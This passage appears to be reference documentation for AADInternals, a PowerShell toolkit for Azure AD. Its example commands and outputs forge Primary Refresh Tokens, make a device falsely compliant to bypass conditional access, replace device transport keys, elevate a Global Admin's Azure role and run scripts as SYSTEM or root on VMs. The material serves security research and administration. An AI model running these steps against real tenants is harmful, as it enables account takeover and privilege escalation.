  Cert file name : "d03994c9-24f8-41ba-a156-1805998d6dc7.pfx"
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013
# Get user's credentials
$creds = Get-Credential

# Get new PRT and key
$prtKeys = Get-UserAADIntPRTKeys -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -Credentials $cred

New-AADIntUserPRTToken (*)

Since version 0.4.1
Creates a new Primary Refresh Token (PRT) as JWT to be used to sign-in as the user.

Example (continuing the previous example):

# Generate a new PRT token
$prtToken = New-AADIntUserPRTToken -Settings $prtKeys -GetNonce

# Get the access token using the PRT token
$at = Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

New-AADIntP2PDeviceCertificate (*)

Since version 0.4.1
Creates a new peer-to-peer (P2P) device or user certificate and exports it and the corresponding CA certificate. It can be used to enable RDP trust between devices of the same AAD tenant.

Example 1:

# Generate a new device P2P certificate using the device certificate
New-AADIntP2PDeviceCertificate -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -TenantId 4169fee0-df47-4e31-b1d7-5d248222b872 -DeviceName "mypc1.company.com"
Output:

Device certificate successfully created:
  Subject:         "CN=d03994c9-24f8-41ba-a156-1805998d6dc7, DC=4169fee0-df47-4e31-b1d7-5d248222b872"
  DnsName:         "mydevice.contoso.com"
  Issuer:          "CN=MS-Organization-P2P-Access [2020]"
  Cert thumbprint: 84D7641F9BFA90767EA3456E443E21948FC425E5
  Cert file name : "d03994c9-24f8-41ba-a156-1805998d6dc7-P2P.pfx"
  CA file name :   "d03994c9-24f8-41ba-a156-1805998d6dc7-P2P-CA.der"

Example 2:

# Generate a new user P2P certificate using the PRT and session key
New-AADIntP2PDeviceCertificate -Settings $prtKeys
Output:

User certificate successfully created:
  Subject:         "CN=TestU@contoso.com, CN=S-1-12-1-xx-xx-xx-xx, DC=0f73eaa6-7fd6-48b8-8897-e382ba96daf4"
  Issuer:          "CN=MS-Organization-P2P-Access [2020]"
  Cert thumbprint: A7F1D1F134569E0234E6AA722354D99C3AA68D0F
  Cert file name : "TestU@contoso.com-P2P.pfx"
  CA file name :   "TestU@contoso.com-P2P-CA.der"

Join-AADIntDeviceToIntuneMDM (M)

Since version 0.4.1
Enrolls the given device to Azure AD and generates a corresponding certificate.

After enrollment, the device is in compliant state, which allows bypassing conditional access (CA) restrictions based on the compliance.

The certificate has no password.

Example:

# Get access token with device id claim
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache

# Enroll the device to Intune
Join-AADIntDeviceToIntune -DeviceName "My computer"
Output:

Intune client certificate successfully created:
  Subject:         "CN=5ede6e7a-7b77-41bd-bfe0-ef29ca70a3fb"
  Issuer:          "CN=Microsoft Intune MDM Device CA"
  Cert thumbprint: A1D407FF66EF05D153B67129B8541058A1C395B1
  Cert file name:  "d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx"
  CA file name :   "d03994c9-24f8-41ba-a156-1805998d6dc7-MDM-CA.der"
  IntMedCA file :  "d03994c9-24f8-41ba-a156-1805998d6dc7-MDM-INTMED-CA.der"

Start-AADIntDeviceDMSync (*)

Since version 0.4.2
Starts a device callback to Intune. Resets also the name of the device to given device name.

Example:

# Start the device 
Start-AADIntDeviceIntuneCallback -pfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7MDM.pfx

Get-AADIntDeviceRegAuthMethods (A)

Since version 0.4.3
Get’s the authentication methods used while registering the device.

For instance, if mfa was used while registering the device, also the PRT has mfa claim present.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Get the authentication methods
Get-AADIntDeviceRegAuthMethods -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7"
Output:

pwd

Set-AADIntDeviceRegAuthMethods (A)

Since version 0.4.3
Set’s the authentication methods used while registering the device.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Set the authentication methods
Set-AADIntDeviceRegAuthMethods -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -Methods pwd,rsa,mfa
Output:

pwd
rsa
mfa

Get-AADIntDeviceTransportKey (A)

Since version 0.4.3
Gets the public key of transport key of the device created during registration/join.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Export the transport key 
Get-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" 
Output:

Device TKPUB key successfully exported:
  Device ID:             d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint:       4b56e1f1b80024359e34010d9aab3ced9c67ff5e
  Cert SHA256:           VD3rdP4R2KMzhp/TdqnoFTg6FaO5R0dE7LoC/H155M=
  Public key file name : "d03994c9-24f8-41ba-a156-1805998d6dc7-TKPUB.json"

Set-AADIntDeviceTransportKey (A)

Since version 0.4.3
Sets the public key of transport key of the device created during registration/join.

Example1:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Change the transport key to the internal any.sts
Set-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -UseBuiltInCertificate

Example2:

# Change the transport key exported earlier
Set-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -JsonFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-TKPUB.json

Example3:

# Change the transport key using pfx
Set-AADIntDeviceTransportKey -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -PfxFileName .\my_cert.pfx -PfxPassword "MyPassword"

Get-AADIntDeviceCompliance (A)

Since version 0.4.3
Gets the user’s device compliance status using AAD Graph API. Does not require admin rights!

Example1:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Get the device compliance
Get-AADIntDeviceCompliance -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7"
Output:

displayName           : SixByFour
objectId              : 2eaa21a1-6362-4d3f-afc4-597592217ef0
deviceId              : d03994c9-24f8-41ba-a156-1805998d6dc7
isCompliant           : False
isManaged             : True
deviceOwnership       : Company
deviceManagementAppId : 0000000a-0000-0000-c000-000000000000

Example2:

# Get the device compliance of owned devices
Get-AADIntDeviceCompliance -My | Format-Table
Output:

displayName   objectId                             deviceId                             isCompliant isManaged deviceOwnership deviceManagementAppId 
-----------   --------                             --------                             ----------- --------- --------------- ---------------------
SixByFour     2eaa21a1-6362-4d3f-afc4-597592217ef0 d03994c9-24f8-41ba-a156-1805998d6dc7       False      True Company         0000000a-0000-0000-c000-000000000000
DESKTOP-X4LCS 8ba68233-4d2b-4331-8b8b-27bc53204d8b c9dcde64-5d0f-4b3c-b711-cb6947837dc2       False      True Company         0000000a-0000-0000-c000-000000000000
SM-1234       c00af9fe-108e-446b-aeee-bf06262973dc 74080692-fb38-4a7b-be25-27d9cbf95705                       Personal

Set-AADIntDeviceCompliant (A)

Since version 0.4.3
Sets the user’s device compliant using AAD Graph API. Does not require admin rights.
Compliant and managed statuses can be used in conditional access (CA) rules.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Set the device compliant
Set-AADIntDeviceCompliant -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -Compliant
Output:

displayName           : SixByFour
objectId              : 2eaa21a1-6362-4d3f-afc4-597592217ef0
deviceId              : d03994c9-24f8-41ba-a156-1805998d6dc7
isCompliant           : True
isManaged             : True
deviceOwnership       : Company
deviceManagementAppId : 0000000a-0000-0000-c000-000000000000

Client functions

Get-AADIntOfficeUpdateBranch

Since version 0.2.4
This function shows the update branch (currently called channel) of the Office.

Example:

# Get Office update branch
Get-AADIntOfficeUpdateBranch

Output:

Update branch: Current

Set-AADIntOfficeUpdateBranch

Since version 0.2.4
This function sets the update branch (currently called channel) of the Office. Must run as administrator.

Branch Channel Notes
InsiderFast Weekly builds, not generally supported
FirstReleaseCurrent Preview of the current
Current Monthly Monthly updates
FirstReleaseDeferred Semi-Annual (Targeted) Preview of the deferred (March and September)
Deferred Semi-Annual Semi-annual updates (January and July)
DogFood Only for Microsoft employees

Example:

# Get Office update branch
Set-AADIntOfficeUpdateBranch -UpdateBranch InsiderFast

Output:

Update branch: InsiderFast

Support and Recovery Assistant (SARA)

Get-AADIntSARAUserInfo

Since version 0.2.4
This function gets user information using Microsoft Support and Recovery Assistant (SARA) API. Can help in diagnostics and problem shooting. The analysis is run at MS diagnostic server and can take up to 30 seconds.

Example:

# Get user information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARAUserInfo -AccessToken $at

Output:

Retrieving information..
Retrieving information..
Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.GetUserAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets, Version=16.0.3144.0, Culture=
                        neutral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Attempting to get information about user "user@company.com".
StartTime             : 2019-07-08T12:29:40.4911399Z
Duration              : 00:00:51.1166849
CoreDuration          : 00:00:51.1166849
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : Extracting information about Office 365 user is completed.
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserComplete
UserMessage           : Successfully got the user information for "user@company.com".
UserMessageId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserSuccessDesc
AdminMessage          : 
SupportMessage        : 
IsMessageShown        : False
GenericInfo           : 
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : d5b4c239-7619-4367-9ccb-e9fe2fe01e23

DisplayName               : Demo USer
FirstName                 : Demo
Guid                      : 67a93665-decb-4058-b42a-271d41c47c61
Id                        : 
Identity                  : EURP185A001.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/demoo365life4.onmicrosoft.com/AdminO365life
IsDirSynced               : False
IsValid                   : True
LastName                  : User
MicrosoftOnlineServicesID : user@company.com
Name                      : DemoUser
NetID                     : 401320004BA7A415
RecipientType             : UserMailbox
RecipientTypeDetails      : UserMailbox
UserPrincipalName         : user@company.com
WindowsEmailAddress       : user@company.com
WindowsLiveID             : user@company.com
IsHybridTenant            : False
Forest                    : EURP185.PROD.OUTLOOK.COM

Get-AADIntSARATenantInfo

Since version 0.2.4
This function gets tenant information using Microsoft Support and Recovery Assistant (SARA) API. Can help in diagnostics and problem shooting. The analysis is run at MS diagnostic server but should take only a second or two.

Example:

# Get user information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARATenantInfo -AccessToken $at -AccessToken $at

Output:

Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.TenantUserInfoAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo, Version=16.0.3144.0, Culture=neu
                        tral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Checking your tenant and account information.
StartTime             : 2019-07-08T12:31:06.1602586Z
Duration              : 00:00:00.6250818
CoreDuration          : 00:00:00.6250818
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : The licenses of your tenant and account are all good!
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.StringsGetTenantInfoSuccess
UserMessage           : 
UserMessageId         : 
AdminMessage          : 
SupportMessage        : <Setup><ProductId>O365ProPlusRetail</ProductId><ReleaseTrack>False</ReleaseTrack></Setup>
IsMessageShown        : False
GenericInfo           : User Puid is not null or empty.OrgIg_User<TenantUserInfo><IsLicensed>True</IsLicensed><ProvisioningStatus>PendingInput</ProvisioningStatus><PreferredLanguage>en</PreferredLanguage/>
                        <ValidationStatus>Healthy</ValidationStatus><ReleaseTrack>Other</ReleaseTrack><LicenseInformations><LicenseInformation><SKUPartNumber>SPE_E5</SKUPartNumber><ServiceStatus><ServiceTy
                        pe>Exchange</ServiceType><ServiceName>INFORMATION_BARRIERS</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Micro
                        softKaizala</ServiceType><ServiceName>KAIZALA_STANDALONE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Bing</S
                        erviceType><ServiceName>MICROSOFT_SEARCH</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><
                        ServiceName>PREMIUM_ENCRYPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WhiteboardServices</ServiceType><ServiceName>
                        WHITEBOARD_PLAN3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP2</ServiceName>
                        <ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP1</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MYANALYTICS_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Servic
                        eStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>PAM_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>To-Do<
                        /ServiceType><ServiceName>BPOS_S_TODO_3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>ProcessSimple</ServiceType><ServiceN
                        ame>FLOW_O365_P3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>PowerAppsService</ServiceType><ServiceName>POWERAPPS_O365_P
                        3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>OfficeForms</ServiceType><ServiceName>FORMS_PLAN_E5</ServiceName><Provisio
                        ningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>Disabled</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftStream</ServiceType><ServiceName>STREAM_O365_E5</ServiceName><ProvisioningStatus>Success</ProvisioningStatus>
                        </ServiceStatus><ServiceStatus><ServiceType>Deskless</ServiceType><ServiceName>Deskless</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><
                        ServiceType>Exchange</ServiceType><ServiceName>THREAT_INTELLIGENCE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Teamspace
                        API</ServiceType><ServiceName>TEAMS1</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WindowsDefenderATP</ServiceType><Servic
                        eName>WINDEFATP</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Windows</ServiceType><ServiceName>WIN10_PRO_ENT_SUB</Service
                        Name><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>
                        Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus>Disabled</Provis
                        ioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceSta
                        tus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</Ser
                        viceType><ServiceName>INTUNE_A</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>
                        AAD_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>YammerEnterprise</ServiceType><ServiceName>YAMMER_ENTERPRISE</S
                        erviceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Sway</ServiceType><ServiceName>SWAY</ServiceName><ProvisioningStatus>Success</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTWAC</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Serv
                        iceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><Service
                        Status><ServiceType>ProjectWorkManagement</ServiceType><ServiceName>PROJECTWORKMANAGEMENT</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus
                        ><ServiceType>MicrosoftOffice</ServiceType><ServiceName>OFFICESUBSCRIPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>M
                        icrosoftCommunicationsOnline</ServiceType><ServiceName>MCOSTANDARD</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Microsoft
                        CommunicationsOnline</ServiceType><ServiceName>MCOMEETADV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftCommunica
                        tionsOnline</ServiceType><ServiceName>MCOEV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceNa
                        me>LOCKBOX_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_O365</ServiceName
                        ><ProvisioningStatus>PendingActivation</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_ENTERPRISE</ServiceName><Provisi
                        oningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_ANALYTICS</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EQUIVIO_ANALYTICS</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Ser
                        viceStatus><ServiceStatus><ServiceType>PowerBI</ServiceType><ServiceName>BI_AZURE_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Ser
                        viceType>Exchange</ServiceType><ServiceName>ATP_ENTERPRISE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adall
                        om</ServiceType><ServiceName>ADALLOM_S_O365</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus></LicenseInformation><LicenseInformation><SKUPartNumber
                        >EMSPREMIUM</SKUPartNumber><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_FOUNDATION</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningSta
                        tus></ServiceStatus><ServiceStatus><ServiceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStat
                        us><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatu
                        s><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline<
                        /ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>
                        RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_A</ServiceName><Provis
                        ioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus
                        >Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Success</Provision
                        ingStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceS
                        tatus></LicenseInformation></LicenseInformations></TenantUserInfo>
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : 81157ffa-d946-4bf8-8d6e-a391b96e4bf6

Azure functions

Grant-AADIntAzureUserAccessAdminRole (AC)

Since version 0.3.3
Elevates the current authenticated Global Admin to Azure User Access Administrator. This allows the admin for instance to manage all role assignments in all subscriptions of the tenant.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Grant Azure User Access Administrator role 
Grant-AADIntAzureUserAccessAdminRole -AccessToken $at

Get-AADIntAzureSubscriptions (AC)

Since version 0.3.3
Lists the tenant’s Azure subscriptions

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Get all subscriptions of the current tenant
Get-AADIntAzureSubscriptions -AccessToken $at

Output:

subscriptionId                       displayName   state  
--------------                       -----------   -----  
867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 MyAzure001    Enabled
99fccfb9-ed41-4179-aaf5-93cae2151a77 Pay-as-you-go Enabled

Set-AADIntAzureRoleAssignment (AC)

Since version 0.3.3
Assigns a given role to the given user. Defaults to the current user.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Grant Virtual Machine Contributor role to the current user
Set-AADIntAzureRoleAssignment -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -RoleName "Virtual Machine Contributor"

Output:

roleDefinitionId : /subscriptions/867ae413-0ad0-49bf-b4e4-6eb2db1c12a0/providers/Microsoft.Authorization/roleDefinitions/9980e02c-c2be-4d73-94e8-173b1dc7cf3c
principalId      : 90f9ca62-2238-455b-bb15-de695d689c12
principalType    : User
scope            : /subscriptions/867ae413-0ad0-49bf-b4e4-6eb2db1c12a0
createdOn        : 2020-06-03T11:29:58.1683714Z
updatedOn        : 2020-06-03T11:29:58.1683714Z
createdBy        : 
updatedBy        : 90f9ca62-2238-455b-bb15-de695d689c12

Get-AADIntAzureClassicAdministrators (AC)

Since version 0.3.3
Returns classic administrators of the given Azure subscription

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement
Get-AADIntAzureClassicAdministrators -AccessToken $at

Output:

emailAddress                  role                                     
------------                  ----                                     
admin@company.onmicrosoft.com ServiceAdministrator;AccountAdministrator
co-admin@comapny.com          CoAdministrator

Get-AADIntAzureResourceGroups (AC)

Since version 0.3.3
Lists Azure subscription ResourceGroups

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# List the Resource Groups
Get-AADIntAzureResourceGroups -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0

Output:

name       location tags
----       -------- ----
Production westus   Production
Test       eastus   Test

Get-AADIntAzureVMs (AC)

Since version 0.3.3
Lists Azure subscription Virtual Machines and shows the relevant information

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# List the VMs
Get-AADIntAzureVMs -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0

Output:

resourceGroup name     location   id                                   computerName adminUserName vmSize          OS     
------------- ----     --------   --                                   ------------ ------------- ------          --     
PRODUCTION    Client   westus     c210d38b-3346-41d3-a23d-27988315825b Client       AdminUSer     Standard_A2_v2  Windows
PRODUCTION    DC       westus     9b8f8753-196f-4f24-847a-e5bcb751936d DC           AdminUSer     Standard_DS1_v2 Windows
PRODUCTION    Exchange westus     a12ffb24-a69e-4ce9-aff3-275f49bba315 Exchange     AdminUSer     Standard_DS2_v2 Windows
PRODUCTION    Server1  westus     c7d98db7-ccb5-491f-aaeb-e71f0df478b6 Server1      AdminUSer     Standard_DS1_v2 Windows
TEST          Server2  eastus     ae34dfcc-ad89-4e53-b0b4-20d453bdfcef Server2      AdminUSer     Standard_DS1_v2 Windows
TEST          Server3  eastus     f8f6a7c5-9927-47f9-a790-84c866f5719c Server3      AzureUser     Standard_B1ms   Linux

Invoke-AADIntAzureVMScript (AC)

Since version 0.3.3
Runs a given script on the given Azure VM as a SYSTEM or root.

Note! Although the scripts supports UTF-8, the response only shows ascii characters so any UTF-8 character is shown incorrectly (bug at Microsoft’s end).

Multi-line scripts are supported. Use `n as a line separator.

Example1:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Invoke "whoami" on Server2
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2 -Script "whoami"

Output1:

[stdout]
nt authority\system

[stderr]

Example2:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Invoke "whoami" on Server3
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup TEST -Server Server3 -Script "whoami" -VMType Linux

Output2:

Enable succeeded: 
[stdout]
root

[stderr]

Example3:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Invoke multi-line script on Server2
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2 -Script "whoami`nGet-Process 123123123"

Output3:

[stdout]
nt authority\system

[stderr]
Get-Process : Cannot find a process with the name "123123123". Verify the process name and call the cmdlet again.
At C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.5\Downloads\script42.ps1:2 char:1
+ Get-Process 123123123
+ ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (123123123:String) [Get-Process], ProcessCommandException
    + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand

Example4:

# List running processes of Server2
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2 -Script "Get-Process"

Output4:


[stdout]
    727      36    14132      27092       5.94    396   0 svchost                                                      
    936      29    69796      76820       7.91    400   0 svchost                                                      
    664      22    15664      27432      39.39    464   0 svchost                                                      
    839      23     6856      24352       0.91    792   0 svchost                                                      
    785      17     4792      10968       4.75    892   0 svchost                                                      
    282      13     3020       9324       7.41   1052   0 svchost                                                      
   1889      96    38548      72480      24.86   1216   0 svchost                                                      
    642      35     8928      28452       0.50   1236   0 svchost                                                      
    519      24    19480      37620       4.08   1376   0 svchost                                                      
    411      17    15440      18076      29.81   1392   0 svchost                                                      
    833      41    10676      25512       2.02   1424   0 svchost                                                      
    317      11     2000       8840       0.08   1432   0 svchost                                                      
    380      31     7324      16320       0.39   1584   0 svchost                                                      
    211      12     1876       7524       0.22   1808   0 svchost                                                      
    199       9     1596       6916       0.00   1968   0 svchost                                                      
    200      10     2308       8344       0.06   2188   0 svchost                                                      
    146       8     1472       7144       0.06   3000   0 svchost                                                      
    468      21     6516      31128       0.33   3140   2 svchost                                                      
    173       9     4332      12968       0.72   3208   0 svchost                                                      
   2061       0      192        156      11.45      4   0 System                                                       
    340      17     3964      17324       0.13   3416   2 TabTip                                                       
    413      24    13016      34008       0.25   4488   2 TabTip                                                       
    103       7     1264       4756       0.00   3264   2 TabTip32                                                     
